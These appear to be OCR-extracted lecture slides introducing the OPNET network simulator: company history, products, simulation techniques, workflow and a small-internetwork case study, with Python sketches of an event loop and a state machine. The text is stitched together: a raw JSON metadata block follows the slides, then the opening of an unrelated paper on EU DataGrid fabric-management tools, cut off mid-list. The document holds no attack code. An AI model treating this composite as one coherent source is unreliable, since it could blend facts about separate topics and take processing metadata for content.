Network Simulators: OPNET Overview and Examples
Roman Dunaytsev
Department of Communications Engineering, Tampere University of Technology
roman.dunaytsev@tut.fi
November 30, 2010

Outline
1. About OPNET
2. IT Guru Academic Edition
3. OPNET Modeler
4. Simulation workflow
5. Example
6. OPNET Modeler editors

About OPNET
- Alain Cohen, a 20-year-old MIT student, developed OPNET in 1986
- Together with his classmate Steven Baraniuk, he developed a prototype data network modeling and simulation system they called "Optimized Network Engineering Tools", or OPNET for short

About OPNET (cont'd)
- Alain Cohen, along with his brother Marc and Steven Baraniuk, founded **MIL 3, Inc.** in 1986 (OPNET 1.1)
- In 2000, MIL 3, Inc. changed its name to **OPNET Technologies, Inc.** (OPNET 7.0)
- Today, OPNET Technologies, Inc. is a provider of software products and related services for:
  - Application performance management
  - Network planning and engineering
  - Network research and development
- **www.opnet.com**
- Chairman & Chief Executive Officer: Marc Cohen
- President & Chief Technology Officer: Alain Cohen

About OPNET (cont'd)
- Selected consolidated financial data (in thousands of US dollars; five most recent fiscal years, most recent first)
- Huge investments in R&D

| | FY (most recent) | FY-1 | FY-2 | FY-3 | FY-4 |
| --- | --- | --- | --- | --- | --- |
| **Revenue:** | | | | | |
| Product | $52,252 | $51,211 | $38,838 | $43,186 | $31,976 |
| Product updates, technical support and services | 47,264 | 43,067 | 34,787 | 28,062 | 24,226 |
| Professional services | 26,831 | 28,601 | 27,721 | 23,882 | 19,913 |
| Total revenue | **126,347** | **122,879** | **101,346** | **95,130** | **76,115** |
| **Cost of revenue:** | | | | | |
| Product | 5,983 | 3,536 | 1,035 | 638 | 657 |
| Product updates, technical support and services | 4,859 | 4,665 | 4,514 | 3,264 | 2,637 |
| Professional services | 19,328 | 20,911 | 19,154 | 15,904 | 13,705 |
| Amortization of acquired technology | 1,835 | 2,172 | 1,486 | 723 | 832 |
| Total cost of revenue | **32,005** | **31,284** | **26,189** | **20,529** | **17,831** |
| **Gross profit** | **94,342** | **91,595** | **75,157** | **74,601** | **58,284** |
| **Operating expenses:** | | | | | |
| Research and development | 32,043 | 30,791 | 27,471 | 21,688 | 18,643 |
| Sales and marketing | 43,181 | 42,533 | 39,357 | 34,133 | 26,300 |
| General and administrative | 11,011 | 11,857 | 11,747 | 10,994 | 13,375 |
| Total operating expenses | **86,235** | **85,181** | **78,575** | **66,815** | **58,318** |

The company's first product was **OPNET Modeler**, a software tool for network simulation and modeling. Since then, the product line has diversified to provide a range of solutions for:
- **Application performance management** - ACE Analyst Standard, ACE Analyst Plus, ACE Enterprise Management Server, OPNET Panorama, ACE Live Appliance, ACE Live Rover, ACE Live on RSP, ACE Live VMon, IT Guru Systems Planner
- **Network planning and engineering** - IT Guru, SP Guru Network Planner, SP Guru Transport Planner, IT Guru Network Planner, NetOne, VNE Server, Report Server, IT NetMapper, IT Sentinel, SP Sentinel, OPNET nCompass for Enterprises, OPNET nCompass for Service Providers
- **Network R&D**

About OPNET (cont'd)
- Sample list of clients:
  - **Service providers** - British Telecom, Deutsche Telekom, France Telecom, Inmarsat, ...
  - **Enterprises** - Deutsche Post AG, FBI, Oracle, 20th Century Fox, Xerox, ...
  - **Network equipment manufacturers** - 3Com Corporation, Cisco Systems, Ericsson, Fujitsu, HP, Nokia, ...
  - **Defense and homeland security**
- **University Program**
  - Over 25,000 university professors and students use OPNET products in Electrical Engineering, Computer Science, and related disciplines
- The following products are available through the University Program:
  1. **IT Guru** - Modeling of a broad range of network protocols and technologies; 800+ protocol and vendor device models
  2. **OPNET Modeler** - IT Guru plus source code for protocol and technology models
  3. **OPNET Modeler Wireless Suite** - OPNET Modeler plus a broad range of wireless models
  4. **SP Guru Transport Planner** - Optical network planning and engineering
  5. **IT Guru Academic Edition** - Based on IT Guru commercial version 9.1 (Build 1999); created for introductory-level networking courses; greatly simplified licensing (6-month renewable license)

IT Guru Academic Edition
- **IT Guru Academic Edition limitations:**
  - Limited import and export capabilities
  - Limited wireless functionality
  - Other product modules are not supported
  - The maximum number of simulation events is limited to 50 million
  - The maximum number of intermediate nodes is limited to 20
- **Supported platforms:**
  - **Microsoft:** Windows 2000, Windows XP, Windows Vista, Windows 7
- **ITG_Academic_Edition_v1999.exe:** ~190 MB

IT Guru Academic Edition (cont'd)
1. Registration - www.opnet.com/university_program/itguru_academic_edition/
2. Download and installation - www.opnet.com/itguru-academic/download.html
3. Activation - www.opnet.com/itguru-academic/instructions.html
System Requirements
- **Supported platforms:**
  - **Linux:** Red Hat Enterprise, Fedora
- **OPNET software does not work with number representations other than English**
  - The reason is the decimal separator: a point in English, a comma in practically all other locales
  - Start ⇒ Control Panel ⇒ Regional and Language Options ⇒ Standards and formats ⇒ English (United States)

Installing OPNET Modeler
- **Supporting software for OPNET Modeler:**
  - **Linux:** gcc 3.4 or higher
- **Install OPNET components in the following order:**
  1. Software
  2. Additional modules (if any)
  3. Model library
  4. Documentation

OPNET network R&D solutions enable you to:
- Test technology designs in realistic scenarios
- Evaluate enhancements to standards-based protocols
- Develop new protocols and technologies

Key Features
- **Hierarchical GUI-based editors**
- **High-fidelity modeling**
  - 800+ wired/wireless protocol and vendor device models with source code
  - Different aspects of wireless communication, including RF propagation, antenna modeling, signal modulation, node mobility, and interference
- **Scalable simulation**
  - 32-bit and 64-bit fully parallel simulation kernel
  - Grid computing support for distributed simulation
- **Sophisticated analysis**
  - Integrated GUI-based debugging and analysis
- **Integrating live network and application behavior**
  - Optional **System-in-the-Loop** module to interface simulations with live systems
  - Open interface for integrating external files, libraries, and other simulators

Simulation Technologies
- OPNET supports 4 simulation technologies:
  - Discrete Event Simulation (DES)
  - Flow Analysis
  - ACE QuickPredict
  - Hybrid Simulation (within the DES environment)

Simulation Technologies (cont'd)
- **Discrete Event Simulation** provides highly detailed models that explicitly simulate packets and protocol messages (a minimal sketch of the underlying event-loop idea is given after this list).
  - The models in DES execute the protocols in much the same way as in a production environment.
  - Although DES provides very high-fidelity results, simulation runtimes are longer than with the other methods.
- **Hybrid simulation** combines two distinct modeling techniques (analytical and discrete) to provide accurate, detailed results for targeted flows.
  - Hybrid simulation relies on background and explicit traffic: **background traffic** represents most of a network's ambient load at an abstract level, while selected network application flows are represented in detail using the **explicit traffic** models.
  - Execution runtimes can be significantly faster than with DES.
- **Flow Analysis** uses analytical techniques and algorithms to model steady-state network behavior.
  - Flow Analysis does not model individual protocol messages or packets, so it does not generate results for transient network conditions.
  - It can be used to study routing and reachability across the network in steady state, and in scenarios with one or more failed devices.
  - Execution runtimes can be significantly faster than with DES.
- **ACE QuickPredict** uses an analytical technique for studying the impact of changing network parameters (e.g., bandwidth, latency, utilization, packet loss) on application response time.
  - This technique is supported within the OPNET Application Characterization Environment (ACE).
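To make the contrast with the analytical methods concrete, the sketch below shows the event-queue idea at the heart of any discrete event simulator. This is plain Python, not OPNET code; the toy traffic model, delays and function names are all invented for illustration.

```python
import heapq

class DES:
    """Minimal discrete-event simulation core (illustrative only)."""
    def __init__(self):
        self.now = 0.0
        self._queue = []      # (time, seq, callback, args)
        self._seq = 0         # tie-breaker for events scheduled at the same time

    def schedule(self, delay, callback, *args):
        heapq.heappush(self._queue, (self.now + delay, self._seq, callback, args))
        self._seq += 1

    def run(self, until=float("inf")):
        # process events strictly in timestamp order until the horizon is reached
        while self._queue and self._queue[0][0] <= until:
            self.now, _, callback, args = heapq.heappop(self._queue)
            callback(*args)   # an event handler may schedule further events

# Toy model: a source sends a packet every second; the link delivers it 5 ms later.
sim = DES()

def deliver(pkt_id):
    print(f"t={sim.now:.3f}s  packet {pkt_id} delivered")

def send(pkt_id):
    print(f"t={sim.now:.3f}s  packet {pkt_id} sent")
    sim.schedule(0.005, deliver, pkt_id)   # propagation/transmission delay
    sim.schedule(1.0, send, pkt_id + 1)    # next packet

sim.schedule(0.0, send, 0)
sim.run(until=3.0)
```

Because every packet and protocol message becomes one or more events in such a queue, fidelity is high but runtime grows with the amount of simulated traffic, which is exactly the trade-off the other three techniques avoid.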
Projects and Scenarios
- OPNET Modeler uses a project-and-scenario approach to model networks.
- **Project** – a collection of network-related scenarios, each of which explores a particular aspect of the network design. All projects contain at least 1 scenario.
- **Scenario** – a single instance of a network. Typically, a scenario presents a unique configuration for the network. The term "configuration" can refer to different aspects such as topology, protocols, applications, traffic, and simulation settings.

Projects and Scenarios (cont'd)
- **OPNET simulation workflow**:
  1. Create a project
  2. Create a baseline scenario
     - Import or create a network topology
     - Import or create traffic
     - Choose statistics to be collected
     - Run the simulation
     - View the results
  3. Duplicate the scenario
     - Make changes
     - Re-run the simulation
     - Compare the obtained results
  4. Repeat Step 3 if needed

Projects and Scenarios (cont'd)
- New project
- The **Project Editor** is used to construct and edit the topology of a network model

Projects and Scenarios (cont'd)
- Project Editor window
![Project Editor window with labeled sections: Menu Bar, Tool Bar, Workspace]

Network Topologies
- Initial topology

Network Topologies (cont'd)
- There are several methods for creating a network topology:
  - Manually, by dragging and dropping objects from an **Object Palette** to the Project Editor workspace
  - Manually, using the Topology ⇒ **Rapid Configuration...** command from the Menu Bar to specify and build a complete network topology quickly
  - Automatically, by **importing** the network model from an external data source – either a system that monitors your network or one or more data files that describe the network
    - Importing a topology ensures that the network model you build corresponds to the existing network exactly

Network Topologies (cont'd)
- Network scale

Network Topologies (cont'd)
- Background maps

Network Topologies (cont'd)
- Zooming

Network Topologies (cont'd)
- Dragging and dropping objects from an **Object Palette** into the Project Editor workspace
- Using the Topology ⇒ **Rapid Configuration...** command from the Menu Bar to quickly deploy common network topologies

Network Topologies (cont'd)
- Available configurations: Bus, Mesh (Full or Randomized), Ring, Star, Tree, and Unconnected Net

Network Topologies (cont'd)
- Using the Topology ⇒ **Deploy Wireless Network...** command from the Menu Bar to specify and build a wireless network

Model Library
- OPNET Modeler provides an extensive library of models that you can use to build networks
- These models are called **standard models** (as opposed to models that users develop themselves)
  - User-developed models can be shared with other OPNET users if desired
- Certain models support the needs of users with particular interests in emerging or vendor-specific technologies (aka **specialized models**)
  - An additional license is needed to use these models in a simulation
- The standard model library consists of the following types of objects:
  - Subnetworks
  - Nodes (aka devices)
  - Links
  - LANs and clouds
  - Utility objects

Objects
- **Model Family**: internet_toolbox
- **Subnetworks**
  - Subnetworks are essentially containers that abstract the network components specified within them into one object. A subnetwork can also contain other subnetworks.
  - A special subnetwork called the top-level or global subnetwork is the highest-level subnetwork in the network hierarchy.
Objects (cont'd)
- **Nodes**
  - A node represents a network device with a wide range of possible capabilities (router, switch, hub, workstation, server, firewall, etc.)
  - The actual function and behavior of a node is determined by its **node model**

Objects (cont'd)
- **Links**
  - Links represent the physical media and their properties (line rate in bits per second, delay, likelihood of data corruption, etc.)
  - Links are represented as line segments or a series of line segments with arrowheads

Objects (cont'd)
- **LANs**
  - A LAN object abstracts the LAN infrastructure into one object
  - LAN objects dramatically reduce the amount of configuration required to represent an internetwork of LANs, and the amount of memory needed to run the simulation
![Object Palette Tree (project1-scenario1)]
- **Clouds**
  - A cloud object abstracts the WAN infrastructure into one object
  - Cloud objects provide high-level characteristics (packet latency and discard ratio) used to simulate the behavior of ATM, Frame Relay, and IP WANs
- **Utility objects**
  - Utility objects do not correspond to the actual physical infrastructure
  - Instead, they perform logical functions in the network (configuration of network resources, scheduling special events, etc.)

Applications and Traffic
- The first step is to drag and drop Application Config and Profile Config objects from the Object Palette to the Project Editor workspace.
- **Application Config** specifies *standard* and *custom* applications used in the simulation, including traffic and QoS parameters.
  - Standard applications (Light/Heavy): Database, Email, FTP, HTTP, Print, Remote Login, Video Conferencing, Voice
- **Profile Config** specifies the activity patterns of a user or group of users in terms of the applications used over a period of time.
  - You can have several different profiles running on a given workstation or LAN.
  - These profiles can represent different user groups and behavior patterns.
- Profiles describe activity patterns, such as:
  - When does a user start using applications?
  - What is the duration of his/her activity?
  - What applications does he/she use?
  - How often does he/she use each application?
- Configure applications ⇒ Define profiles ⇒ Deploy applications (Menu Bar ⇒ Protocols ⇒ Applications ⇒ **Deploy Defined Applications**)

Choosing Statistics
- Choose statistics to collect
  - Menu Bar ⇒ DES ⇒ Choose Individual Statistics...
  - Or right-click in the Project Editor ⇒ Choose Individual DES Statistics
  - A list of statistics appears
- Types of statistics
  - **Global**: collected on the total network (e.g., application response time)
  - **Node**: collected on individual nodes (e.g., delay, delay variation)
  - **Link**: collected on individual links (e.g., utilization, throughput, queuing delay)

Choosing Statistics (cont'd)
- Choose Results dialog box

Running Simulation
- Menu Bar ⇒ DES ⇒ Configure/Run Discrete Event Simulation...
- Set simulation options and click Run

Viewing Results
- Menu Bar ⇒ DES ⇒ Results ⇒ **View Results**...
- Or right-click in the Project Editor ⇒ **View Results**

Case study: Small Internetworks
In this example, you plan for the expansion of a small company's intranet. Currently, the company has a star topology network on the first floor of its office building and plans to add an additional star topology network on another floor.
You will build and test this "what-if" scenario to ensure that the load added by the second network will not cause the network to fail.

Creating the network
- Initial Topology: Create empty scenario
- Choose Network Scale: Office & Use metric units
- Specify Size: 100 m x 100 m
- Select Technologies: Sm_Int_Model_List

Small Internetworks (cont'd)
- **Rapid Configuration**: Star
- **Center Node Model**: 3C_SSII_1100_3300_4s_ae52_e48_ge3
- **Periphery Node Model**: Sm_Int_wkstn
- **Number (of periphery nodes)**: 30
- **Link Model**: 10BaseT
- **Center (X, Y)**: 25, 25
- **Radius**: 20
- **Sm_Int_server, 10BaseT, Sm_Application_Config, Sm_Profile_Config**

Small Internetworks (cont'd)
- Right-click on a node ⇒ View Node Description
- 3C_SSII_1100_3300_4s_ae52_e48_ge3 represents a stack of 4 3Com switches (4s):
  - 2 SuperStack II 1100 switches
  - 2 SuperStack II 3300 switches
  - 52 auto-sensing Ethernet ports (ae52)
  - 48 Ethernet ports (e48)
  - 3 Gigabit Ethernet ports (ge3)

Small Internetworks (cont'd)
- Compare with an abstract node in ns-2: set node_30 [$ns node]

Small Internetworks (cont'd)
- The original network
![Diagram of network with nodes and connections]

Small Internetworks (cont'd)
- Will the server be able to handle the additional load of the second network?
  - Right-click on the **server** node ⇒ Individual DES Statistics ⇒ Node Statistics ⇒ Ethernet ⇒ **Load (bits/sec)**
- Will the total delay across the network be acceptable once the second network is installed?
  - Right-click in the **workspace** (but not on an object) ⇒ Individual DES Statistics ⇒ Global Statistics ⇒ Ethernet ⇒ **Delay (sec)**
- Run the simulation for **30 minutes**

Expanding the network
- Rapid Configuration: Star
- Center Node Model: 3C_SSII_1100_3300_4s_ae52_e48_ge3
- Periphery Node Model: Sm_Int_wkstn
- Number (of periphery nodes): 15
- Link Model: 10BaseT
- Center (X, Y): 75, 62.5
- Radius: 20
- CS_2514_1s_e2_sl2 (Cisco 2514 router), 10BaseT

Small Internetworks (cont'd)
- The extended network

Comparing results
- Menu Bar ⇒ DES ⇒ Results ⇒ **Compare Results...**

Small Internetworks (cont'd)
- The average load for the expansion scenario is higher (as expected)
- But there is no significant change in Ethernet delay on the network

OPNET Modeler Editors
- The **Project Editor** is used to construct and edit the topology of a network model.
- The **Node Editor** provides operations to support creation and editing of node models.
- The **Process Editor** is used to specify the behavior of process models.
  - Process models use a **finite state machine (FSM)** paradigm to express behavior that depends on the current state and new stimuli (a schematic illustration of the FSM idea follows below).
  - The operations performed by a process model are described in statements based on the C or C++ languages.
  - These statements can be associated with states, transitions, or special blocks within the process model.
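As a rough illustration of the FSM paradigm only: real OPNET process models are drawn in the Process Editor and carry C/C++ statements on states and transitions, whereas the sketch below is plain Python with invented states, stimuli and actions.

```python
# Illustrative finite state machine in the spirit of an OPNET process model.
# The (state, stimulus) pairs and the associated actions are made up; in a real
# process model the "action" column would be C/C++ code attached to the transition.

TRANSITIONS = {
    # (current_state, stimulus)   -> (next_state, action)
    ("idle",     "pkt_arrival"):  ("transmit", "start transmission"),
    ("transmit", "tx_complete"):  ("idle",     "free the channel"),
    ("transmit", "collision"):    ("backoff",  "start backoff timer"),
    ("backoff",  "timer_expiry"): ("transmit", "retry transmission"),
}

def step(state, stimulus):
    next_state, action = TRANSITIONS.get((state, stimulus), (state, "ignore"))
    print(f"{state:8s} --{stimulus}--> {next_state:8s} ({action})")
    return next_state

state = "idle"
for stimulus in ["pkt_arrival", "collision", "timer_expiry", "tx_complete"]:
    state = step(state, stimulus)
```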
{"Source-Url": "http://www.cs.tut.fi/kurssit/TLT-2707/lecture12.pdf", "len_cl100k_base": 5055, "olmocr-version": "0.1.53", "pdf-total-pages": 69, "total-fallback-pages": 0, "total-input-tokens": 89786, "total-output-tokens": 7516, "length": "2e12", "weborganizer": {"__label__adult": 0.0004570484161376953, "__label__art_design": 0.00046753883361816406, "__label__crime_law": 0.0004684925079345703, "__label__education_jobs": 0.0087432861328125, "__label__entertainment": 0.00034880638122558594, "__label__fashion_beauty": 0.0002472400665283203, "__label__finance_business": 0.003986358642578125, "__label__food_dining": 0.0003216266632080078, "__label__games": 0.0016374588012695312, "__label__hardware": 0.006378173828125, "__label__health": 0.000453948974609375, "__label__history": 0.0006203651428222656, "__label__home_hobbies": 0.0001399517059326172, "__label__industrial": 0.00151824951171875, "__label__literature": 0.0004010200500488281, "__label__politics": 0.0003063678741455078, "__label__religion": 0.0004808902740478515, "__label__science_tech": 0.1868896484375, "__label__social_life": 0.00022208690643310547, "__label__software": 0.354736328125, "__label__software_dev": 0.4296875, "__label__sports_fitness": 0.0004105567932128906, "__label__transportation": 0.0008425712585449219, "__label__travel": 0.00028014183044433594}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 19760, 0.03399]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 19760, 0.35086]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 19760, 0.76412]], "google_gemma-3-12b-it_contains_pii": [[0, 182, false], [182, 310, null], [310, 438, null], [438, 701, null], [701, 1234, null], [1234, 2913, null], [2913, 3702, null], [3702, 4323, null], [4323, 4990, null], [4990, 5118, null], [5118, 5604, null], [5604, 5865, null], [5865, 5993, null], [5993, 6469, null], [6469, 6876, null], [6876, 7056, null], [7056, 7792, null], [7792, 7952, null], [7952, 8311, null], [8311, 8789, null], [8789, 9235, null], [9235, 9513, null], [9513, 9641, null], [9641, 10133, null], [10133, 10561, null], [10561, 10608, null], [10608, 10691, null], [10691, 11019, null], [11019, 11058, null], [11058, 11689, null], [11689, 11734, null], [11734, 11781, null], [11781, 11820, null], [11820, 11942, null], [11942, 12061, null], [12061, 12188, null], [12188, 12337, null], [12337, 12879, null], [12879, 13031, null], [13031, 13077, null], [13077, 13362, null], [13362, 13599, null], [13599, 13846, null], [13846, 14175, null], [14175, 14398, null], [14398, 14616, null], [14616, 15336, null], [15336, 15672, null], [15672, 16154, null], [16154, 16212, null], [16212, 16333, null], [16333, 16457, null], [16457, 16585, null], [16585, 16995, null], [16995, 17175, null], [17175, 17517, null], [17517, 17806, null], [17806, 17903, null], [17903, 18006, null], [18006, 18466, null], [18466, 18744, null], [18744, 18797, null], [18797, 18866, null], [18866, 19036, null], [19036, 19164, null], [19164, 19250, null], [19250, 19338, null], [19338, 19546, null], [19546, 19760, null]], "google_gemma-3-12b-it_is_public_document": [[0, 182, true], [182, 310, null], [310, 438, null], [438, 701, null], [701, 1234, null], [1234, 2913, null], [2913, 3702, null], [3702, 4323, null], [4323, 4990, null], [4990, 5118, null], [5118, 5604, null], [5604, 5865, null], [5865, 5993, null], [5993, 6469, null], [6469, 6876, null], [6876, 7056, null], [7056, 7792, null], [7792, 
7952, null], [7952, 8311, null], [8311, 8789, null], [8789, 9235, null], [9235, 9513, null], [9513, 9641, null], [9641, 10133, null], [10133, 10561, null], [10561, 10608, null], [10608, 10691, null], [10691, 11019, null], [11019, 11058, null], [11058, 11689, null], [11689, 11734, null], [11734, 11781, null], [11781, 11820, null], [11820, 11942, null], [11942, 12061, null], [12061, 12188, null], [12188, 12337, null], [12337, 12879, null], [12879, 13031, null], [13031, 13077, null], [13077, 13362, null], [13362, 13599, null], [13599, 13846, null], [13846, 14175, null], [14175, 14398, null], [14398, 14616, null], [14616, 15336, null], [15336, 15672, null], [15672, 16154, null], [16154, 16212, null], [16212, 16333, null], [16333, 16457, null], [16457, 16585, null], [16585, 16995, null], [16995, 17175, null], [17175, 17517, null], [17517, 17806, null], [17806, 17903, null], [17903, 18006, null], [18006, 18466, null], [18466, 18744, null], [18744, 18797, null], [18797, 18866, null], [18866, 19036, null], [19036, 19164, null], [19164, 19250, null], [19250, 19338, null], [19338, 19546, null], [19546, 19760, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 19760, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 19760, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 19760, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 19760, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 19760, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 19760, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 19760, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 19760, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 19760, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 19760, null]], "pdf_page_numbers": [[0, 182, 1], [182, 310, 2], [310, 438, 3], [438, 701, 4], [701, 1234, 5], [1234, 2913, 6], [2913, 3702, 7], [3702, 4323, 8], [4323, 4990, 9], [4990, 5118, 10], [5118, 5604, 11], [5604, 5865, 12], [5865, 5993, 13], [5993, 6469, 14], [6469, 6876, 15], [6876, 7056, 16], [7056, 7792, 17], [7792, 7952, 18], [7952, 8311, 19], [8311, 8789, 20], [8789, 9235, 21], [9235, 9513, 22], [9513, 9641, 23], [9641, 10133, 24], [10133, 10561, 25], [10561, 10608, 26], [10608, 10691, 27], [10691, 11019, 28], [11019, 11058, 29], [11058, 11689, 30], [11689, 11734, 31], [11734, 11781, 32], [11781, 11820, 33], [11820, 11942, 34], [11942, 12061, 35], [12061, 12188, 36], [12188, 12337, 37], [12337, 12879, 38], [12879, 13031, 39], [13031, 13077, 40], [13077, 13362, 41], [13362, 13599, 42], [13599, 13846, 43], [13846, 14175, 44], [14175, 14398, 45], [14398, 14616, 46], [14616, 15336, 47], [15336, 15672, 48], [15672, 16154, 49], [16154, 16212, 50], [16212, 16333, 51], [16333, 16457, 52], [16457, 16585, 53], [16585, 16995, 54], [16995, 17175, 55], [17175, 17517, 56], [17517, 17806, 57], [17806, 17903, 58], [17903, 18006, 59], [18006, 18466, 60], [18466, 18744, 61], [18744, 18797, 62], [18797, 18866, 63], [18866, 19036, 64], [19036, 19164, 65], [19164, 19250, 66], [19250, 19338, 67], [19338, 19546, 68], [19546, 19760, 69]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 19760, 0.05263]]}
olmocr_science_pdfs
2024-12-09
2024-12-09
d8fdfd12ac106499f159268b135b754ad2128b77
Towards automation of computing fabrics using tools from the fabric management workpackage of the EU DataGrid project

Olof Bärring, Maite Barroso Lopez, German Cancio, Sylvain Chapeland, Lionel Cons, Piotr Poznański, Philippe Defert, Jan Iven, Thorsten Kleinwort, Bernd Panzer-Steindel, Jaroslaw Polok, Catherine Rafflin, Alan Silverman, Tim Smith, Jan Van Eldik
CERN, CH1211 Geneva-23, Switzerland
Massimo Biasotto, Cristine Aiftimiei, Enrico Ferro, Gaetano Maron
INFN-LNL, Viale dell'Università 2, I-35020 Legnaro (PADOVA), Italy
Andrea Chierici, Luca Dellagnello
INFN-CNAF, Viale Berti Pichat 6/2, I-40127 Bologna, Italy
Marco Serra
INFN-Roma1, P.le Aldo Moro 2, I-00185 Roma, Italy
Michele Michelotto
INFN-PADOVA, Via Marzolo 8, I-35131 Padova, Italy
Thomas Röbitz, Florian Schintke
ZIB, Takustraße 7, D-14195 Berlin – Dahlem, Germany
Lord Hess, Volker Lindenstruth, Frank Pister, Timm Morten Steinbeck
Im Neuenheimer Feld 227, D-69120 Heidelberg, Germany
David Groep, Martijn Steenbakkers
NIKHEF, PO Box 41882, 1009 DB Amsterdam, The Netherlands
Paul Anderson, Tim Colles, Alexander Holt, Alastair Scobie
University of Edinburgh, Old College, South Bridge, Edinburgh EH8 9YL, UK
Michael George
Oxford Street, Liverpool L69 7ZE, United Kingdom
Rafael A. Garcia Leiva
Department of Theoretical Physics, Universidad Autónoma de Madrid, Ctra Colmenar Km 15, 28049 Madrid, Spain

The EU DataGrid project workpackage 4 has as an objective to provide the necessary tools for automating the management of medium-size to very large computing fabrics. At the end of the second project year, subsystems for centralized configuration management (presented at LISA'02) and performance/exception monitoring have been delivered. This will soon be augmented with a subsystem for node installation and service configuration, which is based on existing widely used standards where available (e.g. rpm, kickstart, init.d scripts) and clean interfaces to OS-dependent components (e.g. base installation and service management). The three subsystems together allow for centralized management of very large computer farms. Finally, a fault tolerance system is being developed for tying together the above subsystems to form a complete framework for automated enterprise computing management by 3Q03. All software developed is open source covered by the EU DataGrid project license agreements. This article describes the architecture behind the designed fabric management system and the status of the different developments. It also covers the experience with an existing tool for automated configuration and installation that has been adapted and used from the beginning to manage the EU DataGrid testbed, which is now used for LHC data challenges.

### 1. INTRODUCTION

The EU DataGrid project is a three-year EU-funded project to develop middleware for data-intensive grid applications. The project started in January 2001 and is divided into 12 workpackages: 5 for middleware development, 2 for Grid testbed infrastructure, 3 for scientific applications (HEP, Biology, Earth Science) and 2 for dissemination and management. Workpackage 4, WP4, is one of the middleware workpackages and has as its main objective to deliver a computing fabric comprising all the necessary tools to manage a center providing grid services on clusters of thousands of nodes.
The workpackage is divided into six software development subtasks:
- Configuration management
- System monitoring
- Installation management and maintenance
- Fault tolerance
- Resource management
- "Gridification"

The first four subtasks provide the basic software subsystems for automated fabric management, while the latter two are aimed more at grid-enabling the fabric. This paper will mainly describe the automated fabric management subsystems. The next section describes the high-level architecture for how the different subsystems work together. Thereafter follow four sections with detailed descriptions of each subsystem and its development status. Finally, the conclusions sum up the experience and status so far and the future work up to the end of the project.

### 2. ARCHITECTURE

A high-level view of the WP4 architecture for automated fabric management is depicted in Figure 1.

Figure 1: high-level view of the WP4 architecture for automated fabric management.

The numbered arrows 1 – 13 indicated in Figure 1 describe a typical sequence for the detection of an exception and coordination of the automated recovery:

1. Monitoring data flows from all nodes in the computer center to a monitoring repository
2. The fault tolerance system reads and correlates data from the monitoring system to detect exception conditions that require automated interventions
3. The fault tolerance system instructs the resource management system, which interfaces with the cluster batch system, to remove the node from production and drain/kill (depending on the urgency) running jobs on the node
4. The fault tolerance system informs the monitoring system about the action taken to remove the node from production
5. The resource management system informs the monitoring system when the node has been removed from production and all running jobs have finished
6. The fault tolerance system reads the updated node information and decides to launch the node maintenance
7. Depending on the maintenance action, the fault tolerance system may first change the configuration of the node by committing a new configuration template in the configuration management system. If no reconfiguration is required, the fault tolerance system may either directly launch the repair on the node or instruct the installation and node management system to perform some action (e.g. repair an installation or simply reboot the node)
8. The fault tolerance system informs the monitoring system about the launched repair action
9. The installation and node management system reads the node configuration profile managed by the configuration management system and calls service configuration objects to deploy new configurations or simply restart services
10. Monitoring data flows from all nodes in the computer center to the monitoring repository
11. The fault tolerance system reads data from the monitoring repository and detects that the node has been repaired
12. The fault tolerance system instructs the resource management system to put the node back in production
13. The fault tolerance system informs the monitoring system about the action to put the node back in production

It is important to point out the information model chosen by WP4: the configuration management system manages the desired state while the monitoring system records the actual state. This distinction is necessary since the deployment of configuration changes may take a long time, and in real production clusters the actual state and desired state may only converge asymptotically. For instance, a configuration change that requires a reboot cannot be deployed on all nodes at the same time if a minimum service level is required.
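Purely as an illustration of this control flow, the sketch below compresses the sequence above into one function. It is Python-style pseudocode: every object, method and argument name is hypothetical, and the real subsystems interact through the APIs described in the following sections.

```python
# Hypothetical glue code illustrating steps 1-13: the fault tolerance system
# correlates monitoring data, drains the node, triggers a repair, and reports
# every action back to the monitoring repository so that nothing is lost.

def handle_exception(node, monitoring, resource_mgmt, config_db, installer):
    # steps 1-2: an exception condition has been detected from monitoring data
    monitoring.record_action(node, "exception detected")

    # steps 3-5: take the node out of production and let running jobs drain
    resource_mgmt.remove_from_production(node, drain=True)
    monitoring.record_action(node, "removed from production")

    # steps 6-9: optionally commit a new desired configuration, then repair
    if config_db.needs_new_template(node):
        config_db.commit_template(node)
    installer.deploy_desired_configuration(node)   # reads the node profile
    monitoring.record_action(node, "repair launched")

    # steps 10-13: once monitoring shows the node is healthy, put it back
    if monitoring.node_is_healthy(node):
        resource_mgmt.add_to_production(node)
        monitoring.record_action(node, "back in production")
```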
The monitoring system not only receives normal monitoring data such as performance and exception metrics but is also used to keep track of all automatic recovery actions. It works in conjunction with the fault tolerance system, which takes its input data from the monitoring system and reports back the launched recovery actions. This strict tracing of actions also holds true for manual interventions where, for instance, the acknowledgement of an alarm is recorded by the monitoring system. The aim is to allow for several levels of fault tolerance recovery so that if a repair fails after a certain number of retries, another repair strategy can be selected automatically.

The configuration information for the desired state is expressed in a special declarative language, called the High Level Definition Language, HLDL, developed by WP4. The administrators or service managers write HLDL configuration templates, which are compiled by the configuration management system into node profiles. A node profile is an XML file containing the entire configuration that is to be managed on a node. The HLDL language supports inheritance through inclusion, which allows for managing the configuration information in a hierarchical structure called the template hierarchy. Another hierarchy, the configuration schema, is formed by the name space defined for the configuration parameters. The configuration schema and the template hierarchy are independent.

The installation and node management subsystem includes several components:
- The Automated Installation Infrastructure (AII) for automatic generation of DHCP configuration and kickstart files according to the desired configuration managed by the configuration management system.
